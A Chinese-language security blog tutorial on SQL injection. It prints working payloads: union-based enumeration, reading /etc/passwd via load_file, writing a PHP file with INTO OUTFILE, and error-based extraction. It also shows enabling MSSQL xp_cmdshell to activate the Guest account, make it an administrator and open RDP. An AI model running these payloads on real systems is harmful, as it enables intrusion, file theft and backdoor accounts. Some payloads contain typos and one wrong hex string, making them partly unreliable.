<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>说起各种注入的姿势这件事 | Yum~Yum~Yummyl~</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/css/highlight.css">

  
<meta name="generator" content="Hexo 5.3.0"></head>

<body>
  <div id="wrapper">
    <header id="header">
  <h1 id="title">
    <a href="/">Yum~Yum~Yummyl~</a>
  </h1>
  <nav>
    
    
      
      <a class="nav-link" href="/">Home</a>
    
      
        <span class="nav-spacer">×</span>
      
      <a class="nav-link" href="/archives">Archives</a>
    
    
  </nav>
</header>

    <div id="content">
      <article id="post-说起各种注入的姿势这件事" class="article article-type-post" itemprop="blogPost" itemscope>
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h2 class="article-title" itemprop="headline name">
      说起各种注入的姿势这件事
    </h2>
  


        <div class="article-meta">
          <time class="article-date" datetime="2021-01-21T15:04:24.000Z" itemprop="datePublished">2021-01-21</time>

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
      
        <p>一//sql注入一文精通</p>
<ol>
<li>知识点回顾</li>
</ol>
<p>1.1 什么是sql注入</p>
<pre><code>注入可以理解为服务器将本不该作为代码执行的用户输入作为代码执行，一般在用户与数据库产生交互的地方都有可能存在sql注入（如有增、删、改、查等操作处）。按注入方式可以有GET注入、POST注入等，按注入点可有Header注入，按显错方式可有显错注入和盲注，还有由于编码而产生的宽字节注入；主流的数据库软件有Mysql, sql server, access mongo db等，他们虽然大同小异，但是在实际注入时还是有许多需要注意的地方，这也是我们要详细讲解的；各种名词突然都搬到桌面上来可能会看着很懵，但不着急，我们一个一个来。</code></pre>
<p>1.2 sql语句</p>
<pre><code>sql语句是对数据库进行操作的基本方式，网站或APP后台也是通过这些语句与数据库交互的，我们通过漏洞来进行的sql注入也不例外，都需要这些语句来交互，所以我们首先要熟悉我们的攻击炮弹，才能再去想用什么炮来发射这些炮弹。我将会从增删改查四个方面来讲述，更多的sql语法我将在第二大章的攻击手段中出现并逐一介绍；

1.2.1 增！

添加新用户、新增的交易数据……这些都是向数据库中增加数据，听说过向某连锁酒店后台的会员库中添加入自己的账号并且挪用他人余额给自己账号充值的故事，这个黑帽子用的就是增和改！我们先来说一说“增”这个语句；

insert into table_name value(1,2,3,4,...) &lt;==&gt; 把value(1,2,3,4,...)插入到（insert into）到table_name中；

举一个栗子，比如名字叫crew_basic_infor原表中有三条员工基本信息数据，像这样；

| 姓名 | 年龄 | 性别 | 民族 |
| 张三 |  18  |  男  |  汉  |
| 李四 |  27  |  男  |  汉  |
| 王五 |  26  |  女  | 蒙古 |

我现在在数据库中输入， insert into crew_basic_infor value(&#39;于三十六&#39;, &#39;24&#39;, &#39;男&#39;, &#39;蒙古&#39;)；

那么现在的数据库就变成了：

|   姓名   | 年龄 | 性别 | 民族 |
|   张三   |  18  |  男  |  汉  |
|   李四   |  27  |  男  |  汉  |
|   王五   |  26  |  女  | 蒙古 |
| 于三十六 |  24  |  男  | 蒙古 |

我们的这条数据就被“插入”进去了昂；

好，基础的讲完了再来点进阶的菜。

1.2.2 删！

删除数据，经常听说有公司运维与管理闹不和删库跑路的，当然最后都被抓住了，这是严重侵害公司利益，同事利益的违法行为。作为一名安全人员也应该有这样的意识，在找漏洞的过程中一定不能对现有公司的业务产生影响，如果必要一定要先报备再干活，不然总有一天会进去的。删库脱库这种事是绝对不能干滴。

言归正传，delete删除，这个sql语句长这个样子:

delete * from table_name(where 姓名=&#39;张三&#39;) &lt;==&gt; 把table_name这个表里的所有(*)(叫张三的(where 姓名=&#39;张三&#39;))数据都删除(delete)掉；

很简单昂，还是这个例子，crew_basic_infor表中数据像这样；

|   姓名   | 年龄 | 性别 | 民族 |
|   张三   |  18  |  男  |  汉  |
|   李四   |  27  |  男  |  汉  |
|   王五   |  26  |  女  | 蒙古 |
| 于三十六 |  24  |  男  | 蒙古 |

我输入 delete from crew_basic_infor where 姓名=&#39;张三&#39;，表就变成了这样：

|   姓名   | 年龄 | 性别 | 民族 |
|   李四   |  27  |  男  |  汉  |
|   王五   |  26  |  女  | 蒙古 |
| 于三十六 |  24  |  男  | 蒙古 |

1.2.3 改！

有前两个的基础直接上例子：
接上表，我输入Update table_name set 性别=&#39;女&#39;, 年龄=&#39;30&#39; where 姓名=&#39;李四&#39;

|   姓名   | 年龄 | 性别 | 民族 |
|   李四   |  30  |  女  |  汉  |
|   王五   |  26  |  女  | 蒙古 |
| 于三十六 |  24  |  男  | 蒙古 |

1.2.4 查！

查！是很重要的，我们来好好掰扯掰扯。

select * from from table_name &lt;==&gt; 从(from)table_name表中的选取(select)所有数据(*)

同样的，后面也可以添加限定条件，并且可以用and连接多个条件，where column_name_1=&#39;xx&#39; and column_name_2=&#39;xx&#39;

数据库则会将符合条件的数据返回来，比如输入select * from crew_basic_infor where 姓名=&#39;李四&#39;会返回

|   姓名   | 年龄 | 性别 | 民族 |
|   李四   |  30  |  女  |  汉  |

同样可以用union/union all语句将多个select语句联合在一起，合并多个select语句的结果，值得注意的是连接的多个select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 SELECT 语句中的列的顺序必须相同，我个人经常忽略这一点...场面经常十分尴尬。

上面说了，union或者union all 都可以做联合查询， 两者的区别在于查询的多个表中有相同数据时，union会只显示其中一个，union all 则会显示全部；</code></pre>
<p>1.3 常见数据库</p>
<pre><code>数据库是“按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。大致可分为关系型数据库和非关系型数据库；

百度是这么说的：
…………关系型数据库，存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似，关系型数据库中表与表之间是有很多复杂的关联关系的。 常见的关系型数据库有Mysql，SqlServer等。在轻量或者小型的应用中，使用不同的关系型数据库对系统的性能影响不大，但是在构建大型应用时，则需要根据应用的业务需求和性能需求，选择合适的关系型数据库。…………非关系型数据库，指的是分布式的、非关系型的、不保证遵循ACID原则的数据存储系统。NoSQL数据库技术与CAP理论、一致性哈希算法有密切关系……

看一看就好了，先不用理解，只需要记住关系型数据库使用sql语言，非关系型数据库使用unql语言，剩下的我们一个一个来看，在这一小节中我将根据每一类型的数据的特点并且结合例子来讲解；</code></pre>
<p>1.3.1 Mysql数据库</p>
<pre><code>Mysql是关系型数据库，由瑞典公司开发，目前属于Oracle旗下产品。默认端口号是3306，延时命令是sleep()，Mysql是目前最流行的关系型数据库之一，所以关于他的篇幅将多一些。

- 联合查询

找到注入点以后则可以进行联合查询；比如，一个新闻网站会根据不同的id号返回不同的新闻内容，其查询语句是

select * from table_name where id=&#39;用户输入&#39;

我们就可以闭合原本有的单括号，并且在后面输入我们的sql语句[1&#39; order by 10 -- q],先order by 一下来看一看当前库有多少个字段，如下：

select * from table_name where id=&#39;1&#39; order by 10 -- q&#39;

这个语句我们一个部分一个部分的来看，首先，[1&#39;]这个部分，是给原本的select语句传一个正常的id值。 [order by]这个部分作为排序，后面一般情况下跟的是字段名，但是我们在不知道字段名字的时候可以用,12345（罗马数字）来代替，也就是分别代表第一字段，第二字段…… 第三部分[-- q&#39;]，还记得前面讲的[--空]嘛， 因为在url栏中输入末尾的空格会被浏览器省略掉，所以可以使用[+]或者url编码的[%20]来代替空格，或者在--后面加空格和任意字符，来让这个空格不被忽略掉，回车时就会发现，这个空格被替换为[%20]了。
如果原本表中只有4个字段，那么order by 10必然不会返回正常的结果，所以这一部分可以多试一试，直到返回正常页面为止。

假如我们现在知道这个注入点的关联库有4个字段了，我们现在来找寻显错点，从这里开始就要使用union字段了。现在总体的语句变成了：    

select * from table_name where id=&#39;1&#39; and 1=2 union select 1,2,3,4 -- q&#39;

这里要说一下为什么有一个[and 1=2]， 首先union会结合多个select语句的查询结果然后展现出来，但我们现在就想知道的我们想查的东西，所以 and 1=2 本身是否， 加在前面一个select语句的where 中，第一个select语句也就变成了[select * from table_name where id=&#39;1&#39; and 1=2],这个意思否定句了，不找了。所以在显示的时候只会显示我们后一句的[select 1,2,3,4]， 我们就可以看到了这个注入点的回显点。

以mysql为例子，后面就是老套路了:
select * from table_name where id=&#39;1&#39; and 1=2 union select 1,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=DATABASE(),3,4 -- q
select * from table_name where id=&#39;1&#39; and 1=2 union select 1,COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_SCHEMA=DATABASE() AND TABLE_NAME=&#39;TABLE_NAME&#39;,3,4 -- q

最后得到库名，表名，字段名，就可以查询了。

- 注释类型

注释在sql注释中用到的很多，mysql中支持三种注释方式，分别是 &#39;#&#39;,&#39;--空&#39;,&#39;/**/&#39;

- 特殊库表

MySQL 5.0 及其以上版本提供了 INFORMATION_SCHEMA，这是一个信息数据库，它提供了访问数据库元数据的方式。下面介绍如何从中读取数据库名称、表名称以及列名称。所以如果网站管理员没有注意到这一点的时候，我们拥有读取INFORMATION_SCHEMA表的权限时，注入就变得简单了许多。

- 特殊函数

-- load_file()读文件函数
load_file()函数允许用户快速读取文件，但文件的位置必须在服务器上，文件必须为绝对路径，卡额用户必须有FILE权限，文件容量也必须小于max_allowed_packet字节（默认为16MB-1GB），该参数在mysql配置文件my.cnf中
利用语句如下：
UNION SELECT 1, load_file(&#39;/etc/passwd&#39;), 3, 4 #
如果防注入语句不允许单引号出现，那么可以将引号内的文本换成16进制进行绕过，：
UNION SELECT 1, load_file(0x2F6561342F706173737764), 3, 4 #

-- into outfile()写文件函数
into outfile()与 load_file() 一样，必须有 FILE 权限，并且文件必须为全路径名称。
SELECT &#39;&lt;?php phpinfo();?&gt;&#39; into oufile &#39;C:\wwwroot\1.php&#39;
这一句意思就是把select后面的内容写入文件中，网站管理员可能是这样操作的，这可能有助于你的理解；
SELECT * FROM test_outfile INTO OUTFILE &quot;C:/Users/Administrator/Desktop/201909/2019-09-03.txt&quot; FIELDS TERMINATED BY &quot;,&quot; ENCLOSED BY &#39;&quot;&#39;;

-- concat()/concat_ws()/group_concat() 连接字符串
concat函数可以连接一个或多个字符串并且Concat函数在连接字符串的时候，只要其中一个是null，返回就是null；
concat_ws表示concat with separator,即有分隔符的字符串连接，例如select concat_ws(&#39;|&#39;,&#39;11&#39;,&#39;22&#39;,&#39;33&#39;);//11|22|33；
group_concat()是必须将group by按照什么东西排序，也打印出来；否则函数不起作用group_concat([DISTINCT] 要连接的字段[Order BY ASC/DESC 排序字段] [Separator ‘分隔符’])；

-- updatexml() 函数执行函数
首先了解下updatexml()函数：
updatexml (XML_document, XPath_string, new_value);
第一个参数：XML_document是String格式，为XML文档对象的名称；
第二个参数：XPath_string (Xpath格式的字符串) ，
第三个参数：new_value，String格式，替换查找到的符合条件的数据
SELECT * FROM message WHERE id = 1 and updatexml(1, (concat(0x7c, (SELECT @@version))), 1)
其中的concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，报错，会显示出无法识别的内容：

-- extractvalue()函数
使用方法和上面的Updtexml()类似，同时通过报错来返回数据的。例如SEELCT * FROM message WHERE id= 1 AND extravtvalue(1, concat(0x7c, (SELECT user())))</code></pre>
<p>1.3.2 Sql Server数据库</p>
<pre><code>SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS)，是一个比较大型的数据库。端口号为 1433。数据库后缀名 .mdf，注释符是 -- 。延时命令：WAITFOR  DELAY  &#39;0:0:2&#39;

SQLServer有三个权限级别，sa权限：数据库操作，文件管理，命令执行，注册表读取等system。SQLServer数据库的最高权限；db权限：文件管理，数据库操作等权限 users-administrators；public权限：数据库操作 guest-users；

- 常用命令
select is_srvrolemember(&#39;sysadmin&#39;) # 判断是否是SA权限
select is_member(&#39;db_owner&#39;) # 判断是否是db_owner权限
select is_srvrolemember(&#39;public&#39;) # 判断是否是public权限

select @@version;       #查询数据库的版本
select @@servername;    #查询服务名
select host_name();     #查询主机名，如果是用navicat远程连接的话，主机名是本地的名字
select db_name();       #查询当前数据库名
select db_name(1);      #查询第一个数据库名
select db_name(2);      #查询第二个数据库名
select user;            #查询当前数据库的拥有者，结果为 dbo。dbo是每个数据库的默认用户，具有所有者权限，全称：datebaseOwner ，即DbOwner 
use tempdb              #切换到tempdb表  
top n                   #查询前n条记录
limit 2,3               #查询第2条开始的3条数据，也就是2,3,4
select substring(&#39;string&#39;,2,1)     #截取给定字符串的索引为2的1个字符
select ascii(&#39;a&#39;)                  #查询给定字符串的ascii值
select len(&#39;string&#39;)               #查询给定字符串的长度
EXEC sp_spaceused @updateusage = N&#39;TRUE&#39;;  #查询当前数据库的大小
sp_spaceused &#39;表名&#39;                #查询指定表名的大小

- 特殊机制
xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
select count(*) FROM master..sysobjects Where xtype = &#39;X&#39; AND name = &#39;xp_cmdshell&#39;#判断xp_cmdshell是否开启
如果没有开启的话，可以使用下面命令来开启：
execute(&#39;sp_configure &quot;show advanced options&quot;,1&#39;)  #将该选项的值设置为1
execute(&#39;reconfigure&#39;)                             #保存设置
execute(&#39;sp_configure &quot;xp_cmdshell&quot;, 1&#39;)           #将xp_cmdshell的值设置为1
execute(&#39;reconfigure&#39;)                             #保存设置
execute(&#39;sp_configure&#39;)                            #查看配置
execute(&#39;xp_cmdshell &quot;whoami&quot;&#39;)                    #执行系统命令

或者
exec sp_configure &#39;show advanced options&#39;,1;       
reconfigure;                                       
exec sp_configure &#39;xp_cmdshell&#39;,1;                 
reconfigure;                                      
exec sp_configure;                                 
exec xp_cmdshell &#39;whoami&#39;;                         

可以执行系统权限之后,前提是获取的主机权限是administrators组里的
exec xp_cmdshell &#39;net user Guest 123456&#39;              #给guest用户设置密码
exec xp_cmdshell &#39;net user Guest /active:yes&#39;         #激活guest用户
exec xp_cmdshell &#39;net localgroup administrators Guest /add&#39;  #将guest用户添加到administrators用户组
exec xp_cmdshell &#39;REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f&#39;        #开启3389端口</code></pre>
<p>1.3.3 Access数据库</p>
<p>1.3.4 Orcale数据库</p>
<p>1.3.5 Mongo db数据库</p>
<p>1.3.6 Radis</p>
<pre><code>Redis 是完全开源的，遵守 BSD 协议，是一个高性能的 key-value 数据库。

Redis 与其他 key - value 缓存产品有以下三个特点：

- Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的时候可以再次加载进行使用。
- Redis不仅仅支持简单的key-value类型的数据，同时还提供list，set，zset，hash等数据结构的存储。
- Redis支持数据的备份，即master-slave模式的数据备份。</code></pre>
<p>1.3.6 小结</p>
<ol start="2">
<li><p>工具详解</p>
</li>
<li><p>1 Sqlmap</p>
</li>
<li><p>2 源码梳理</p>
</li>
<li><p>思路演示</p>
</li>
<li><p>参考资料</p>
<p> [1]关系型数据库，百度百科，<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93/8999831?fr=aladdin">https://baike.baidu.com/item/%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93/8999831?fr=aladdin</a>;<br> [2]三种数据库的 SQL 注入详解，YT–98，<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43915762/article/details/87909751">https://blog.csdn.net/weixin_43915762/article/details/87909751</a>;<br> [3]SQLServer数据库注入详解，谢公子，<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36119192/article/details/88679754#SA%E6%9D%83%E9%99%90%E5%BC%80%E5%90%AFxp_cmdshell%E8%8E%B7%E5%8F%96%E4%B8%BB%E6%9C%BA%E6%9D%83%E9%99%90">https://blog.csdn.net/qq_36119192/article/details/88679754#SA%E6%9D%83%E9%99%90%E5%BC%80%E5%90%AFxp_cmdshell%E8%8E%B7%E5%8F%96%E4%B8%BB%E6%9C%BA%E6%9D%83%E9%99%90</a></p>
</li>
</ol>

      
    </div>
    
    
    
  </div>
</article>

  
<nav id="article-nav" class="article-nav">
  
    <a href="/2021/01/21/%E7%BC%96%E7%A0%81%E7%9A%84%E7%BA%B7%E7%BA%B7%E6%89%B0%E6%89%B0/" id="article-nav-newer" class="article-nav-link-wrap newer">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          编码的纷纷扰扰
        
      </div>
    </a>
  
  
    <a href="/2021/01/21/%E6%B5%85%E8%B0%88%E6%BA%AF%E6%BA%90/" id="article-nav-older" class="article-nav-link-wrap older">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">
        
          浅谈溯源
        
      </div>
    </a>
  
</nav>






    </div>
  </div>
  




<div id="settings-container">
  <div id="dark-mode">dark</div>
  <div id="sans-font">sans</div>
</div>
<script type="text/javascript">
let d=document,r=d.documentElement.style,f=r.setProperty.bind(r),l=localStorage,s=l.getItem('s')||(window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches),n=l.getItem('n'),m=d.getElementById("dark-mode"),b=()=>{f('--bg-color','#fafafa');f('--code-bg-color','#f4f4f4');f('--text-color','#212121');f('--secondary-color','#808080');f('--tertiary-color','#b0b0b0');f('--link-color','#b5c8cf');f('--link-hover-color','#618794');f('--link-bg-color','#dae4e7');f('--selection-color','#dae4e7');m.innerHTML="dark"},c=()=>{f('--bg-color','#212121');f('--code-bg-color','#292929');f('--text-color','#fff');f('--secondary-color','#c0c0c0');f('--tertiary-color','#6e6e6e');f('--link-color','#4d6b75');f('--link-hover-color','#96b1bb');f('--link-bg-color','#5d828e');f('--selection-color','#acc1c9');m.innerHTML="light"},o=d.getElementById("sans-font"),e=()=>{f('--body-stack','"Lora", "Georgia", "Times New Roman", serif');o.innerHTML="sans"},g=()=>{f('--body-stack','"Lato", "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", "Verdana", sans-serif');o.innerHTML="serif"};m.onclick=()=>{if(s==2){s=1;l.setItem('s',s);c()}else{s=2;l.setItem('s',s);b()}};o.onclick=()=>{if(n==2){n=1;l.setItem('n',n);g()}else{n=2;l.setItem('n',n);e()}};if(!s){s=2;l.setItem('s',2)};if(s==1){c()};if(!n){n=2;l.setItem('n',2)};if(n==1){g()};
</script>




</body>
</html>
